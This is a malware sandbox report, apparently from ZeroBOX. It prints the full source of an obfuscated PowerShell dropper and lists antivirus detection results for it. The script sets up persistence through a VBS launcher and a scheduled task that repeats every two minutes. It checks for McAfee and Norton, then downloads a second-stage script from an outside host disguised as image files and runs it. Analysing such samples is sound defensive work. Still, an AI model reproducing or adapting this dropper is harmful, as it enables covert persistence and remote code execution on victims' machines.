Static | ZeroBOX
No static analysis available.
Function XoX
start-sleep -s 2
[system.io.directory]::CreateDirectory("C:\ProgramData\WindowsHost\")
New-Item -Path C:\ProgramData\WindowsHost\APHostRes.vbs -ItemType File
start-sleep -s 1
Set-ItemProperty -Path C:\ProgramData\WindowsHost\APHostRes.vbs -Name IsReadOnly -Value $True
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\APHostRes.vbs -Value 'set A = CreateObject("WScript.Shell")' -Force
start-sleep -s 1
Add-Content -Path C:\ProgramData\WindowsHost\APHostRes.vbs -Value 'A.run "powershell -ExecutionPolicy Bypass & C"+":"+"\"+"U"+"s"+"e"+"r"+"s"+"\"+"P"+"u"+"b"+"l"+"i"+"c"+"\AppMon.ps1",0' -Force
start-sleep -s 1
Get-Content -Path C:\ProgramData\WindowsHost\APHostRes.vbs
start-sleep -s 3
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\WindowsHost\APHostRes.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "BlbEvents"
start-sleep -s 6
$DEV = 'C>><<<>><<<>>blic\'.Replace(">><<<>><<<>>",":\Users\Pu")
$mcAfee = "C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe"
$nort = "C:\Program Files\Norton Security\isolate.ini"
if([System.IO.File]::Exists($mcAfee)){
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://amigoasesor.com/.POP/.A.jpg', $DEV + 'AppMon.ps1')){
start-sleep -s 7
Start "C:\ProgramData\WindowsHost\APHostRes.vbs"
elseif([System.IO.File]::Exists($nort)){
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://amigoasesor.com/.POP/.B.jpg', $DEV + 'AppMon.ps1')){
start-sleep -s 7
Start "C:\ProgramData\WindowsHost\APHostRes.vbs"
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://amigoasesor.com/.POP/.C.jpg', $DEV + 'AppMon.ps1')){
start-sleep -s 7
Start "C:\ProgramData\WindowsHost\APHostRes.vbs"
IEX XoX
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Heur.BZC.PZQ.Pantera.14.3AA84977
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Heur.BZC.PZQ.Pantera.14.3AA84977
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Script.Save.6c5b6d26
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.YT
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Pantera.14.3AA84977
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Emsisoft Heur.BZC.PZQ.Pantera.14.3AA84977 (B)
F-Secure Malware.VBS/Runner.VPUT
DrWeb VBS.DownLoader.2305
VIPRE Heur.BZC.PZQ.Pantera.14.36109B7F
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Heur.BZC.PZQ.Pantera.14.3AA84977
Sophos Clean
Ikarus Trojan.PowerShell.Agent
GData Heur.BZC.PZQ.Pantera.14.3AA84977
Jiangmin Clean
Avira VBS/Runner.VPUT
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Pantera.14.3AA84977
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=86)
VBA32 Clean
Zoner Clean
Tencent Vbs.Trojan.Runner.Ncnw
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.